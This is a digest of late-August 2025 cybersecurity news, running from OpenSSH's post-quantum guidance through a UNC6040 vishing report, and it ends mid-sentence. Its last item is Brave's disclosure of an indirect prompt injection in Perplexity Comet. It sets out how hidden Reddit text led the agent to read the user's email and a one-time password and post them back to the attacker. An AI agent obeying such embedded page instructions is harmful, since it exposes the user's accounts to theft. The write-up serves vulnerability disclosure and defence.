openssh.com - OpenSSH supports a number of cryptographic key agreement algorithms considered to be safe against attacks from quantum computers. We recommend that all SSH connections use these algorithms. OpenSSH has offered post-quantum key agreement (KexAlgorithms) by default since release 9.0 (April 2022), initially via the sntrup761x25519-sha512 algorithm. More recently, in OpenSSH 9.9, we have added a second post-quantum key agreement mlkem768x25519-sha256 and it was made the new default scheme in OpenSSH 10.0 (April 2025). To encourage migration to these stronger algorithms, OpenSSH 10.1 will warn the user when a non post-quantum key agreement scheme is selected, with the following message: WARNING: connection is not using a post-quantum key exchange algorithm. This session may be vulnerable to "store now, decrypt later" attacks. The server may need to be upgraded. See https://openssh.com/pq.html This warning is displayed by default but may be disabled via the WarnWeakCrypto option in ssh_config(5). Background A quantum computer (QC) is a device capable of performing computations with information encoded as quantum states. Such a device could quickly solve particular problems that are intractable for existing "classical" computers. The mathematics that underpin a number of cryptographic algorithms are among the problems that quantum computers are believed to be able to effectively solve. This means that a sufficiently-powerful quantum computer (a.k.a a "cryptographically-relevant" quantum computer) will be able to break them. Most affected is the cryptography used for key agreement and digital signatures, both of which play important roles in SSH. Fortunately, quantum computers of sufficient power to break cryptography have not been invented yet. Estimates for when a cryptographically-relevant quantum computer will arrive, based on the rate of progress in the field, range from 5-20 years, with many observers expecting them to arrive in the mid-2030s. The entire privacy of an SSH connection depends on cryptographic key agreement. If an attacker can break the key agreement then they are able to decrypt and view the entire session. The attacker need not perform this attack in real time; they may collect encrypted SSH sessions now and then decrypt them later once they have access to a quantum computer. This is referred to as a "store now, decrypt later" attack (also as "harvest now, decrypt later"). Fortunately, improved "post-quantum" cryptographic algorithms have been devised that rely on different underlying mathematical problems that are understood to not be attackable by a quantum computer. OpenSSH has supported post-quantum key agreement to prevent "store now, decrypt later" attacks for several years and it has been the default since OpenSSH-9.0, released in 2022. FAQ I received a warning from ssh that directed me to this page. What should I do? As mentioned above, OpenSSH 10.1 started warning users when connections use cryptography that is not safe against quantum computers. If you received such a warning, it means that the server you connected to did not offer one of the two post-quantum key agreement algorithms that are being standardised for the SSH protocol: mlkem768x25519-sha256 and sntrup761x25519-sha512 The ideal solution is to update the server to use an SSH implementation that supports at least one of these. OpenSSH versions 9.0 and greater support sntrup761x25519-sha512 and versions 9.9 and greater support mlkem768x25519-sha256. If your server is already running one of these versions, then check whether the KexAlgorithms option has disabled their use. If you are unable to update the server and/or you prefer to accept the risk of continuing to use quantum-unsafe cryptography then the warning may be silenced via the WarnWeakCrypto option in ssh_config(5). We recommend doing this selectively, for example: Match host unsafe.example.com WarnWeakCrypto no Quantum computers don't exist yet, why go to all this trouble? Because of the "store now, decrypt later" attack mentioned above. Traffic sent today is at risk of decryption unless post-quantum key agreement is used. What about signature algorithms? You said they were at risk too Yes, most currently-used signature algorithms (including RSA and ECDSA) can be broken by a quantum computer. However, there is no risk to existing traffic in this situation (i.e. there is no analogous "store now, decrypt later"). The only urgency for signature algorithms is ensuring that all classical signature keys are retired in advance of cryptographically-relevant computers becoming a reality. OpenSSH will add support for post-quantum signature algorithms in the future. I don't believe we'll ever get quantum computers. This is a waste of time Some people consider the task of scaling existing quantum computers up to the point where they can tackle cryptographic problems to be practically insurmountable. This is a possibility. However, it appears that most of the barriers to a cryptographically-relevant quantum computer are engineering challenges rather than underlying physics. If we're right about quantum computers being practical, then we will have protected vast quantities of user data. If we're wrong about it, then all we'll have done is moved to cryptographic algorithms with stronger mathematical underpinnings. These post-quantum algorithms are new. Are we sure they aren't broken? We're wary of this too. Though post-quantum key agreement algorithms have received a lot of concerted cryptographic attention over the last few years, it's possible that new attacks might be found. To defend against this happening we have selected post-quantum algorithms with good safety margins. This means that even if they turn out to be weaker than expected they are still likely to be strong enough to be considered fit for purpose. Additionally, all the post-quantum algorithms implemented by OpenSSH are "hybrids" that combine a post-quantum algorithm with a classical algorithm. For example mlkem768x25519-sha256 combines ML-KEM, a post-quantum key agreement scheme, with ECDH/x25519, a classical key agreement algorithm that was formerly OpenSSH's preferred default. This ensures that the combined, hybrid algorithm is no worse than the previous best classical algorithm, even if the post-quantum algorithm turns out to be completely broken by future cryptanalysis.
Je suis une entreprise suisse. Suis-je concernée par NIS2?
incyber.org Marie De Freminville 26.08.25 La directive NIS2 (Network and Information Security 2), adoptée par l'Union européenne, devait être transposée par chaque État membre de l’UE en droit national, au plus tard en octobre 2024, avec des processus et plannings de transposition spécifiques à chaque pays. Compte-tenu de l’augmentation des menaces cyber, elle impose des normes plus strictes en matière de cybersécurité, de gestion des risques, et de réaction aux incidents, que la directive NIS, datant de 2016. Cette nouvelle directive élargit les attentes et le champ d’application. Elle a pour objectif d’anticiper les nouvelles formes d’attaques, de passer d’une approche réactive à une stratégie proactive, et de mettre en place une collaboration étendue, pour l’ensemble de l’écosystème, afin d’assurer la résilience des infrastructures critiques. Son champ d’application est plus large et s’étend aux entités considérées comme essentielles ou importantes (ex. : énergie, transport, santé, infrastructures numériques, administration publique, etc.). Pour plus de détails, consulter https://monespacenis2.cyber.gouv.fr/directive/. NIS2 n’est pas directement applicable en Suisse. Néanmoins, une entreprise suisse, est concernée, notamment si elle fait partie de la chaîne d’approvisionnement critique d’entreprises de l’Union européenne soumises à NIS2. Par exemple en tant que fournisseur de services numériques, ou infrastructures critiques transfrontalières, ou si elle opère au sein de l’Union européenne, à travers une filiale, qui rentre dans le périmètre de NIS2 (champ d’application mentionné ci-dessus). Au-delà de la stricte conformité, le respect des standards européens dans le domaine numérique constitue un pilier de la confiance entre les entreprises suisses et leurs partenaires ou clients européens, et l’application de ces standards renforcera la sécurité des entités suisses qui s’y conformeront. Les principales questions à se poser: Mon entreprise a-t-elle une filiale, succursale, ou entité juridique dans un pays de l’UE ? Mon entreprise fournit-elle des services à des clients situés dans l’UE (entreprises, États, infrastructures critiques) ? Mon entreprise héberge-t-elle, traite-t-elle ou transporte-t-elle des données de citoyens européens ? Mon entreprise opère-t-elle dans un secteur “essentiel” ( énergie, santé, banques, transport, infrastructures numériques, eau, espace, administration publique) ou important (agroalimentaire, services numériques, recherche, chimie, déchets, fabrication critique)? Si l’entreprise suisse répond à l’un de ces critères, ou si le contrat qui la lie à son client contient des obligations de conformité à NIS2, elle doit s’assurer que son dispositif de cybersécurité comprend notamment: Un CISO ou responsable cybersécurité clairement identifié, Une politique de cybersécurité formelle, validée par la direction, Une procédure de gestion des incidents (notification ≤ 24h), Des analyses de risques réguliers, des audits et tests, visant à s’assurer de la solidité du dispositif, Des formations à la cybersécurité pour administrateurs et dirigeants. Dans le secteur financier, les institutions bancaires ayant une filiale / succursale dans l’UE ou agissant en tant que sous-traitant ou partenaire de banques/acteurs européens devront mettre en place: Une gouvernance de la cybersécurité au niveau du conseil d’administration, nommer un responsable cybersécurité (CISO) au niveau exécutif, réviser la stratégie de cybersécurité, mettre en place un comité de sécurité informatique. Une cartographie et une gestion des risques liés à la sécurité des systèmes d’information : identifier les actifs essentiels au fonctionnement de la banque, inclure la chaîne d’approvisionnement, les fournisseurs IT et interconnexions. Des procédures de notification d’incidents dans des délais très courts (24 heures), et un plan de réponse aux incidents cyber. Des audits de conformité, et un tableau de bord (suivi des indicateurs de sécurité et des exigences NIS2). Une vérification de la maturité des fournisseurs de services bancaires numériques, IT, cloud, etc. dans le domaine de la cybersécurité, c’est-à-dire leur imposer le respect des standards NIS2. Un programme de sensibilisation et formation pour les collaborateurs, les dirigeants et le conseil d’administration. Une mise à jour des contrats avec les fournisseurs IT, et une vérification des niveaux de sécurité des sous-traitants. Le secteur bancaire est déjà très réglementé : la FINMA (autorité des marchés financiers en Suisse) impose des exigences strictes via ses circulaires, comme 2018/3 « Outsourcing » et 2023/1 « Gestion des risques informatiques », fondées sur le risque et la proportionnalité. Les initiatives de la Confédération (NCSC) s’inscrivent aussi dans une logique de rapprochement avec les standards européens. Autres entités essentielles du secteur financier, les IMF (Infrastructures de Marchés Financiers) : plateformes de négociation (bourses, MTF- Multi Trading Facilities, OTF- Organised Trading Facilities, systèmes de cotation), chambres de compensation (CCP), dépositaires centraux de titres (CSD), systèmes de règlement, fournisseurs d’indicateurs de référence critiques, opérateurs de données de marché réglementés. En Suisse, ces entités incluent des acteurs comme SIX Group, SIX x-clear, SIX SIS, ou Swiss Interbank Clearing (SIC), qui gèrent des systèmes critiques nationaux, mais aussi interconnectés avec l’UE. Bien que la Suisse ne soit pas soumise directement à NIS2, ses IMF opèrent à l’international, en particulier dans l’UE et traitent des données financières critiques, souvent partagées avec des contreparties européennes. Bien qu’elles soient déjà soumises à des réglementations rigoureuses, comme LFIN, LBVM, Règlement sur l’infrastructure des marchés financiers, directives FINMA, standards ISO 27001/22301, etc., les IMF suisses devront démontrer leur conformité équivalente aux exigences NIS2, même de façon contractuelle ou opérationnelle. Dans le secteur de la santé, les hôpitaux et cliniques, les laboratoires, les fournisseurs de soins critiques, les entreprises technologiques médicales (eHealth, MedTech, télémédecine) et les prestataires IT (cloud santé, DMP, plateformes de données médicales) collaborant avec l’UE, sont considérés comme entités essentielles (Annexe I de NIS2). Comme dans l’industrie bancaire, les entreprises de ce secteur ont de nouvelles obligations et doivent être en mesure de produire les documents suivants: Politique cybersécurité Santé (avec exigences NIS2), Analyse de risques IT / DMP / IoMT, Procédure de notification d’incidents, Registre de conformité / tableau de bord, Rapports d’audit / plans de remédiation, Attestations de sensibilisation / format. Dans le secteur de l’énergie, les opérateurs de réseaux, les producteurs, les fournisseurs, et les prestataires techniques (ex : SCADA: système de supervision industrielle, OT : operational technology, cloud industriel) doivent se conformer à NIS2, dans la mesure où ils doivent répondre aux attentes de partenaires européens et autorités européennes, avec un objectif de renforcer la résilience des infrastructures critiques. Par ailleurs, les entreprises de ce secteur doivent anticiper l’évolution du droit suisse (LSI, OICN, etc.), qui doit converger avec NIS2, par le biais de l’Ordonnance sur la protection des infrastructures critiques (OICN) et les directives de l’OFEN et du NCSC. Les particularités du secteur de l’énergie sont les suivantes: Inclure l’OT, la production, les fournisseurs et la télégestion dans la politique de sécurité Créer un comité cybersécurité interdisciplinaire avec les représentants IT, OT, opérations, conformité, Cartographier les systèmes critiques : supervision automatisée, contrôle distribué, réseaux de distribution, postes haute tension, infrastructures partagées avec l’UE Renforcer les mesures de sécurité sur les systèmes informatiques industriels (notamment séparation des environnements et contrôle des accès), détecter les incidents, mettre en place un plan de continuité d’activité / reprise des activités, revoir les contrats des fournisseurs IT avec une clause de conformité NIS2. Former les administrateurs et dirigeants, mais aussi les opérateurs industriels et informatiques. Dans le secteur des transports, la directive NIS2 couvre toutes les formes de transport critiques: aérien (compagnies aériennes, gestionnaires d’aéroports, contrôle aérien), ferroviaire (opérateurs ferroviaires, gestionnaires d’infrastructures, services d’aiguillage), maritime (ports, transporteurs maritimes, systèmes de navigation, opérateurs de fret), et routier (sociétés d’autoroutes, gestion du trafic, plateformes logistiques essentielles (moins prioritaire mais possible selon les pays membres) La Suisse étant étroitement interconnectée avec les réseaux européens, est partie prenante d’accords transfrontaliers (ex : transport ferroviaire européen, sécurité aérienne avec l’EASA, corridors logistiques). Elle est soumise à ses propres cadres de cybersécurité (p. ex. OICN, LSI, exigences de l’Office fédéral des transports – OFT) et ses entreprises de transport sont donc fortement incitées à s’aligner volontairement sur NIS2, et notamment à sécuriser les systèmes industriels (isolation, segmentation réseau, surveillance des SCADA), identifierindemtifier les systèmes interconnectés avec l’UE. Enfin, les infrastructures numériques suisses sont étroitement interconnectées à celles de l’UE ( interconnexion Internet, transit IP, cloud européens, réseaux transfrontaliers), elles sont susceptibles d’héberger ou transporter des données européennes (dans le cas d’acteurs cloud ou de services numériques globaux). Elles sont soumises à la Loi sur la sécurité de l’information (LSI), la Loi sur les télécommunications (LTC), et aux recommandations du NCSC et du SEFRI.qui sont un pilier central de la directive NIS2. Les fournisseurs d’infrastructure numérique suisses (fournisseurs de ser...
L'Enisa reçoit 36 millions d'euros pour renforcer la réponse aux crises cyber
www.usine-digitale.fr Alice Vitard 26 août 2025 Dans le cadre du Cyber Solidarity Act, l'Agence de l'Union européenne pour la cybersécurité se voit confier la gestion de la réserve européenne de cybersécurité. Grâce à une enveloppe de 36 millions d'euros, elle est chargée de sélectionner et de coordonner des prestataires capables d'intervenir en cas d'incidents de grande ampleur. La Commission européenne et l'Agence de l'Union européenne pour la cybersécurité (European Union Agency for Cybersecurity, ENISA) ont annoncé le 26 août avoir signé un accord de contribution qui confie à l'Enisa l'administration et le fonctionnement de la réserve européenne de cybersécurité. Une enveloppe de 36 millions d'euros sur trois ans lui a ainsi été attribuée. Répondre aux incidents à grande échelle Cette réserve est prévue à l'article 14 du Cyber Solidarity Act, texte adopté en 2024 pour doter l'Union de moyens renforcés pour détecter, préparer et répondre aux cyberattaques à grande échelle. Elle doit permettre à l'UE de disposer de capacités communes de réponse aux incidents majeurs. En pratique, la réserve est conçue comme un mécanisme de soutien mobilisable en cas d'incident transfrontalier significatif. Il s'appuie sur un réseau de prestataires de services managés de confiance, pré-sélectionnés via des appels d'offres publics. Ces prestataires peuvent intervenir pour contenir une attaque, assurer une continuité de service ou encore accompagner la reprise après incident. A noter que le dispositif inclut une clause de flexibilité. En effet, si les services pré-engagés ne sont pas utilisés pour des réponses à incident, ils pourront être convertis en services de préparation (tests de sécurité, exercices de crise et audit de résilience). La réserve ouverte à un panel d'acteurs Dans le détail, la réserve sera ouverte aux secteurs critiques définis par la directive NIS 2, aux institutions, agences et organes de l'UE. Sous certaines conditions, les pays tiers associés au programme "Europe numérique" pourront également y avoir accès. L'Enisa se voit confier quatre missions : lancer et gérer les marchés publics pour sélectionner les prestataires, évaluer les demandes d'assistance provenant des Etats membres, transmettre les demandes de pays tiers à la Commission européenne pour validation ainsi que de suivre et contrôler l'exécution des services fournis par les prestataires de services. L'accord de contribution prévoit un financement de 36 millions d'euros sur trois ans. Ces fonds s'ajoutent au budget annuel de 26,9 millions d'euros. Ils sont alignés sur la durée de mise à disposition des services. Leur utilisation est contrôlée par l'exécutif européen. Combler le manque de réponse coordonnée En mutualisant les ressources, la réserve européenne a pour objectif de combler une lacune de longue date : l'absence d'une capacité de réponse coordonnée aux attaques de grande ampleur. Dans ce cadre, le Cyber Solidarity Act prévoit également le déploiement de SOC transfrontaliers ainsi que des financements européens spécifiques pour soutenir la montée en capacité des Etats membres en matière de sécurité informatique.
Hundreds of Swedish municipalities impacted by suspected ransomware attack on IT supplier
therecord.media Alexander Martin August 27th, 2025 A suspected ransomware attack on a Swedish software provider is believed to have impacted around 200 of the country’s municipal governments. A suspected ransomware attack on Miljödata, a Swedish software provider used for managing sick leave and similar HR reports, is believed to have impacted around 200 of the country’s municipal governments. The attack was detected on Saturday, according to the company’s chief executive Erik Hallén. The attackers are attempting to extort Miljödata, police told local newspaper BLT. Swedish Minister for Civil Defence Carl-Oskar Bohlin wrote in a short update on social media: “The scope of the incident has not yet been clarified, and it is too early to determine the actual consequences.” Hallén told Swedish press agency TT that around 200 municipalities and regions were affected by the incident. Sweden has 290 municipalities and 21 regions. Several regional governments have confirmed using Miljödata systems to handle employee data, including “for example, medical certificates, rehabilitation plans, work-related injuries, and more,” according to the local government of the island of Gotland. Hallén reportedly said Miljödata was “working very intensively with external experts to investigate what happened, what and who was affected, and to restore system functionality.” “The government is receiving ongoing information about the incident and is in close contact with the relevant authorities,” Bohlin, the civil defense minister, said. “CERT-SE, which has the task of supporting Swedish society in handling and preventing IT security incidents, has offered advice and support to both the company in question and the affected customers,” the minister added. “The national cybersecurity center is coordinating the measures of the relevant authorities. A police investigation is also underway.” He stressed the incident underscored the need for high levels of cybersecurity throughout society, and said the Swedish government planned to present a new cybersecurity bill to the Swedish parliament in the near future “that will impose increased requirements on a wide range of actors.”
Thousands of Developer Credentials Stolen in macOS “s1ngularity” Attack
https://hackread.com by Deeba Ahmed August 28, 2025 A supply chain attack called “s1ngularity” on Nx versions 20.9.0-21.8.0 stole thousands of macOS developer credentials with the help of AI tools. Asophisticated cyberattack, dubbed the “s1ngularity” attack, has compromised Nx, a popular build platform widely used by software developers. The attack, which began on August 26, 2025, is a supply chain attack, a type of security breach where hackers sneak malicious code into a widely used piece of software, which then infects all the people who use it. The attack was designed to steal a wide variety of sensitive data, including GitHub tokens, npm authentication keys, and SSH private keys. These credentials are essentially digital keys that provide access to a user’s accounts and systems. The malicious software also went a step further, targeting API keys for popular AI tools like Gemini, Claude, and Q, demonstrating a new focus on emerging technologies. In addition to stealing data, the attackers installed a destructive payload that modified users’ terminal startup files, causing their terminal sessions to crash. GitGuardian’s analysis shared with Hackread.com revealed some surprising details about the attack and its victims. The firm found that 85% of the infected systems were running macOS, highlighting the attack’s particular impact on the developer community, which frequently uses Apple computers. In a curious turn, GitGuardian found that of the hundreds of systems where AI tools were targeted, many of the AI clients unexpectedly resisted the malicious requests. They either outright refused to run the commands or gave responses suggesting they knew they were being asked to do something wrong, showing a potential, though unintentional, new layer of security. The stolen credentials were not only valuable but also widespread. GitGuardian’s monitoring platform, which tracks public GitHub activity, discovered 1,346 repositories used by the attackers to store stolen data. To avoid detection, the attackers double-encoded the stolen data before uploading it. This number is far higher than the ten publicly visible repositories, as GitHub was quickly working to delete the rest. An analysis of these repositories revealed 2,349 distinct secrets, with over 1,000 still valid and working at the time of the report. The most common secrets were for GitHub and popular AI platforms. For anyone who used the malicious Nx versions 20.9.0 through 21.8.0, the most crucial step is to immediately assume that their credentials have been exposed. GitGuardian has created a free service called HasMySecretLeaked that allows developers to check for compromised credentials without ever revealing their actual keys. This attack reminds us that simply deleting a compromised file is not enough; the actual secret keys and tokens must be revoked and rotated to prevent further access by the attackers.
Swiss hospitals join forces against cyber-attacks - SWI swissinfo.ch
www.swissinfo.ch August 28, 2025 - Swiss health groups found national cyber-security centre to warn against cyber attacks. The cantonal hospital authorities of Ticino and Graubünden are among the founders of the Healthcare Cyber Security Centre (H-CSC). The premise is that “hospitals are tempting targets for cybercriminals, since they handle large quantities of sensitive data,” said H-CSC as it was officially established in Thurgau. The initiative in Ticino was also joined by the Gruppo ospedaliero Moncucco, which brings together the Moncucco clinics in Lugano and Santa Chiara in Locarno, and a Graubünden foundation made up of health care associations, including the Thusis hospital. Founding members also include the university hospitals of Basel, Bern and Zurich, but not in Geneva and Lausanne. French-speaking institutions are clearly under-represented – the Fribourg and Valais hospitals are the only members from this region. But H-CSC is set to grow. “Membership of the association will be open from 1 September 2025 to all hospitals with a public service mandate”. The H-CSC project was launched last year on the recommendation of the Federal Office for Cyber Security. The aim of the association is to offer tailor-made security services for hospitals in the field of cyber security. The H-CSC (https://www.h-csc.ch/) will serve as a platform to promote knowledge exchange and collaboration between hospitals, expand existing competencies and create synergies that will “sustainably strengthen their ability to prevent, detect and contain cyber incidents”, the association’s website states. Such incidents can “severely compromise the functioning (of hospitals), causing the postponement of surgeries, encryption and/or disclosure of sensitive patient data, or the inoperability of medical devices.”
Euro banks block 'unauthorized' PayPal direct debits
www.theregister.com 2025/08/28/ - US payments platform back in action, says it's informing affected customers Shoppers and merchants in Germany found themselves dealing with billions of euros in frozen transactions this week, thanks to an apparent failure in PayPal's fraud-detection systems. According to the Association of German Banks, the problem hit on Monday when banks noticed a slew of recent unauthorized direct debits from PayPal. The body said the banks responded in various ways, which is one way of putting it – the Süddeutsche Zeitung reported that some stopped all PayPal transactions, with the total number of frozen payments likely to be around €10 billion. A spokesperson for the German Savings Banks Association (DSGV), which represents hundreds of regional banks across the country, confirmed the issue to The Register. The DSGV said PayPal had assured it the problem was resolved, adding that PayPal payments had been running smoothly since Tuesday morning and the US payments platform was informing affected customers "directly." The DSGV said the unauthorized payments had a "significant impact on transactions throughout Europe, particularly in Germany." However, there have been no confirmed reports of the incident being felt outside Germany. Austrian media reported that the banks there had seen no problems. PayPal is the most popular method of online payment in Germany, having been used for 28.5 percent of online purchases last year, according to research by the EHI Retail Institute. (The next most popular option is buying on account.) That's largely down to PayPal's payment protection, which appeals to privacy-conscious Germans. In the wake of the unauthorized direct debit issue, financial industry consultant Peter Woeste Christensen told local media that PayPal's particular strength in Germany was partly thanks to the poor user experience of German banks' own apps. PayPal had not responded to The Register's request for comment at the time of publication, although SZ quoted a spokesperson as saying PayPal had quickly identified the cause and was working with banks to "ensure all accounts are updated." The US company referred to the incident as a "temporary service interruption." PayPal's reputational hit in Germany is likely to be exacerbated by last week's reports of hackers offering millions of PayPal credentials that they claimed PayPal had recently exposed in plaintext. The hackers' claims appear dubious, with PayPal denying any recent breach, but the reports gained significant traction in Germany. "It's possible that the data is incorrect or outdated," read a Wednesday advisory from the German consumer organization Stiftung Warentest, which bundled the leak report with this week's snafu. "Nonetheless, PayPal users should change their passwords as a precaution."
cstromblad.com Christoffer Strömblad Wednesday, August 27, 2025 - In this multi-source analysis I’ve attempted to fuse publicly available information about the UNC6040 group into one report and analysis to provide a better view of the activity cluster named UNC6040 (Google/Mandiant naming). Executive Summary UNC6040 represents a sophisticated financially motivated threat group that has emerged as a significant threat to organizations utilizing cloud-based customer relationship management systems. First identified by Google’s Threat Intelligence Group1, this actor has been conducting voice phishing campaigns since at least December 20242 to compromise Salesforce environments for large-scale data theft and extortion purposes. The group has successfully breached approximately 20 organizations across hospitality, retail, and education sectors3, demonstrating a clear preference for targets with substantial customer databases and valuable personally identifiable information. Perhaps most notably, the group successfully compromised Google’s own Salesforce environment through sophisticated OAuth token abuse4, highlighting their capability to breach even well-defended organizations. What distinguishes UNC6040 from traditional threat actors is their primary reliance on social engineering rather than technical exploitation. By impersonating IT support personnel through voice calls, they guide victims to authorize malicious connected apps, specifically modified versions of Salesforce’s Data Loader tool1. This approach effectively bypasses traditional security controls including multi-factor authentication, representing a fundamental shift in the threat landscape that security teams must address. Threat Actor Profile and Victimology UNC6040’s targeting reveals a calculated approach to victim selection. The group primarily focuses on luxury retailers, hospitality organizations, and educational institutions3, with additional confirmed targeting of aviation, financial services, and technology companies2. This sector preference suggests a clear understanding of where high-value customer data concentrates and where cloud CRM adoption is mature. The threat actor demonstrates varying levels of technical proficiency across different intrusions, with some operations achieving complete data extraction while others result in only partial exfiltration before detection1. This inconsistency may indicate either multiple operators with different skill levels or an evolving tradecraft as the group refines their techniques. Intelligence suggests potential collaboration with other threat actors, particularly the ShinyHunters collective4. UNC6040 may engage in partnership models where initial compromise and data theft are followed by collaboration with specialized extortion groups months after the initial breach1. This delayed monetization strategy complicates attribution and incident response efforts. Operational Capabilities and Techniques The group’s attack methodology begins with extensive reconnaissance through automated phone systems and live calls where operators impersonate IT support staff53. This initial intelligence gathering phase allows them to understand organizational structures, identify key personnel, and develop credible pretexts for their social engineering approaches. The technical implementation involves guiding victims to Salesforce’s connected app setup page where they authorize malicious applications using connection codes1. These modified Data Loader applications are often disguised with legitimate-sounding names such as “My Ticket Portal” to align with the social engineering narrative13. Once authorized, these applications provide API-level access enabling bulk data exfiltration through legitimate platform features. Post-compromise activities extend beyond the initial Salesforce environment. The group demonstrates capability for lateral movement, targeting Okta, Microsoft 365, and Workplace environments to harvest additional credentials and expand their access32. They employ test queries before conducting full data extraction1, suggesting a methodical approach to validating access and identifying high-value datasets. The group’s data exfiltration focuses on customer PII including names, dates of birth, addresses, phone numbers, and account metadata2. By avoiding custom malware and instead relying on legitimate tools and platform features, they maintain a minimal forensic footprint that complicates detection and attribution efforts2. Infrastructure and Operational Security UNC6040 demonstrates strong operational security practices, primarily accessing victim environments through Mullvad VPN IP addresses1. This VPN usage provides anonymity and complicates law enforcement efforts to track the group’s activities. The threat actors also utilize Okta phishing panels hosted on the same infrastructure as their vishing operations1, suggesting a centralized approach to their technical infrastructure. The group’s infrastructure choices reflect an understanding of modern detection capabilities and a deliberate effort to blend malicious activity with legitimate traffic patterns. By leveraging standard Salesforce API calls and OAuth workflows4, they avoid triggering traditional security alerts focused on malware or anomalous network traffic. Strategic Outlook and Future Developments The success of UNC6040’s operations, including the high-profile breach of Google’s Salesforce environment4, will likely inspire both evolution of their own tactics and adoption of similar techniques by other threat actors. In the near term, we assess with moderate confidence that the group will expand their targeting to additional cloud CRM platforms as organizations increase security awareness around Salesforce-specific threats. The demonstrated collaboration between UNC6040 and groups like ShinyHunters4 suggests a maturing criminal ecosystem where specialized actors collaborate to maximize the value extracted from compromised organizations. This partnership model is likely to expand, with UNC6040 potentially serving as an initial access broker for ransomware operations or other extortion groups. The fundamental challenge posed by UNC6040 lies not in their technical sophistication but in their exploitation of human trust and legitimate platform features. As organizations implement phishing-resistant MFA and enhanced monitoring capabilities5, the group will likely evolve their social engineering tactics and potentially shift toward supply chain targeting through managed service providers and cloud service integrators. Looking forward, the convergence of voice-based social engineering with OAuth abuse and API-level data access represents a maturation of the threat landscape that traditional perimeter-based security models are poorly equipped to address. Organizations must anticipate continued activity from UNC6040 and similar groups, with potential escalation in both the scale of operations and the sophistication of social engineering techniques employed. The shift from technical exploitation to identity-based attacks demonstrated by UNC6040 requires a fundamental reconsideration of security architectures. As legitimate platform features become the primary vector for data exfiltration, the distinction between authorized and malicious activity becomes increasingly nuanced, demanding behavioral analytics and continuous monitoring capabilities that many organizations currently lack. https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-data-extortion/ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎ https://unit42.paloaltonetworks.com/retail-hospitality-heists-in-the-digital-age/ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎ https://www.varonis.com/blog/salesforce-vishing-threat-unc604 ↩︎ ↩︎ ↩︎ ↩︎ ↩︎ https://guardz.com/blog/from-vishing-to-oauth-abuse-how-shinyhunters-compromised-the-cloud/ ↩︎ ↩︎ ↩︎ ↩︎ ↩︎ https://cloud.google.com/blog/topics/threat-intelligence/technical-analysis-vishing-threats/ ↩︎ ↩︎
Agentic Browser Security: Indirect Prompt Injection in Perplexity Comet
brave.com blog Published Aug 20, 2025 - The attack we developed shows that traditional Web security assumptions don't hold for agentic AI, and that we need new security and privacy architectures for agentic browsing. The threat of instruction injection At Brave, we’re developing the ability for our in-browser AI assistant Leo to browse the Web on your behalf, acting as your agent. Instead of just asking “Summarize what this page says about London flights”, you can command: “Book me a flight to London next Friday.” The AI doesn’t just read, it browses and completes transactions autonomously. This will significantly expand Leo’s capabilities while preserving Brave’s privacy guarantees and maintaining robust security guardrails to protect your data and browsing sessions. This kind of agentic browsing is incredibly powerful, but it also presents significant security and privacy challenges. As users grow comfortable with AI browsers and begin trusting them with sensitive data in logged in sessions—such as banking, healthcare, and other critical websites—the risks multiply. What if the model hallucinates and performs actions you didn’t request? Or worse, what if a benign-looking website or a comment left on a social media site could steal your login credentials or other sensitive data by adding invisible instructions for the AI assistant? To compare our implementation with others, we examined several existing solutions, such as Nanobrowser and Perplexity’s Comet. While looking at Comet, we discovered vulnerabilities which we reported to Perplexity, and which underline the security challenges faced by agentic AI implementations in browsers. The attack demonstrates how easy it is to manipulate AI assistants into performing actions that were prevented by long-standing Web security techniques, and how users need new security and privacy protections in agentic browsers. The vulnerability we’re discussing in this post lies in how Comet processes webpage content: when users ask it to “Summarize this webpage,” Comet feeds a part of the webpage directly to its LLM without distinguishing between the user’s instructions and untrusted content from the webpage. This allows attackers to embed indirect prompt injection payloads that the AI will execute as commands. For instance, an attacker could gain access to a user’s emails from a prepared piece of text in a page in another tab. How the attack works Setup: An attacker embeds malicious instructions in Web content through various methods. On websites they control, attackers might hide instructions using white text on white backgrounds, HTML comments, or other invisible elements. Alternatively, they may inject malicious prompts into user-generated content on social media platforms such as Reddit comments or Facebook posts. Trigger: An unsuspecting user navigates to this webpage and uses the browser’s AI assistant feature, for example clicking a “Summarize this page” button or asking the AI to extract key points from the page. Injection: As the AI processes the webpage content, it sees the hidden malicious instructions. Unable to distinguish between the content it should summarize and instructions it should not follow, the AI treats everything as user requests. Exploit: The injected commands instruct the AI to use its browser tools maliciously, for example navigating to the user’s banking site, extracting saved passwords, or exfiltrating sensitive information to an attacker-controlled server. This attack is an example of an indirect prompt injection: the malicious instructions are embedded in external content (like a website, or a PDF) that the assistant processes as part of fulfilling the user’s request. Attack demonstration To illustrate the severity of this vulnerability in Comet, we created a proof-of-concept demonstration: In this demonstration, you can see: A user visits a Reddit post, with a comment containing the prompt injection instructions hidden behind the spoiler tag. The user clicks the Comet browser’s “Summarize the current webpage” button. While processing the page for summarization, the Comet AI assistant sees and processes these hidden instructions. The malicious instructions command the Comet AI to: Navigate to https://www.perplexity.ai/account/details and extract the user’s email address Navigate to https://www.perplexity.ai./account and log in with this email address to receive an OTP (one-time password) from Perplexity (note that the trailing dot creates a different domain, perplexity.ai. vs perplexity.ai, to bypass existing authentication) Navigate to https://gmail.com, where the user is already logged in, and read the received OTP Exfiltrate both the email address and the OTP by replying to the original Reddit comment The attacker learns the victim’s email address, and can take over their Perplexity account using the exfiltrated OTP and email address combination. Once the user tries to summarize the Reddit post with the malicious comment in Comet, the attack happens without any further user input. Impact and implications This attack presents significant challenges to existing Web security mechanisms. When an AI assistant follows malicious instructions from untrusted webpage content, traditional protections such as same-origin policy (SOP) or cross-origin resource sharing (CORS) are all effectively useless. The AI operates with the user’s full privileges across authenticated sessions, providing potential access to banking accounts, corporate systems, private emails, cloud storage, and other services. Unlike traditional Web vulnerabilities that typically affect individual sites or require complex exploitation, this attack enables cross-domain access through simple, natural language instructions embedded in websites. The malicious instructions could even be included in user-generated content on a website the attacker doesn’t control (for example, attack instructions hidden in a Reddit comment). The attack is both indirect in interaction, and browser-wide in scope. The attack we developed shows that traditional Web security assumptions don’t hold for agentic AI, and that we need new security and privacy architectures for agentic browsing. Possible mitigations In our analysis, we came up with the following strategies which could have prevented attacks of this nature. We’ll discuss this topic more fully in the next blog post in this series. The browser should distinguish between user instructions and website content The browser should clearly separate the user’s instructions from the website’s contents when sending them as context to the backend. The contents of the page should always be treated as untrusted. Note that once the model on the backend gets passed both the trusted user request and the 